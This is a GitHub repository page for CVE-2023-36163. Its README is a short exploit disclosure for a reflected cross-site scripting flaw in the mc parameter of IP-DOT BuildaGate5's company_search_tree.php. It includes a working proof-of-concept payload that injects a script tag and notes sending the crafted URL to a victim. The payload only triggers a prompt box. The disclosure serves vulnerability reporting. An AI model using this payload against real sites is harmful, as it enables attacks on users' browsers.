Skip to content
/ CVE-2023-36163 Public

Cross Site Scripting vulnerability in IP-DOT BuildaGate v.BuildaGate5 allows a remote attacker to execute arbitrary code via a crafted script to the mc parameter of the URL

2 stars 1 fork Branches Tags Activity
Star
Notifications

TraiLeR2/CVE-2023-36163

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits

README.md

README.md

 
 

Repository files navigation

Exploit Title: BuildaGate5library - Reflected Cross-Site Scripting (XSS)

Date: 06/07/2023

Exploit Author: Idan Malihi

Vendor Homepage: None

Version: 5

Tested on: Microsoft Windows 10 Pro

CVE: CVE-2023-36163

PoC:

An attacker needs to find the vulnerable parameter (mc=) and inject the JS code like: '><script>prompt("XSS");</script><div id="aa

After that, the attacker must send the full URL with the JS code to the victim and inject their browser.

#Payload: company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa

About

Cross Site Scripting vulnerability in IP-DOT BuildaGate v.BuildaGate5 allows a remote attacker to execute arbitrary code via a crafted script to the mc parameter of the URL

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published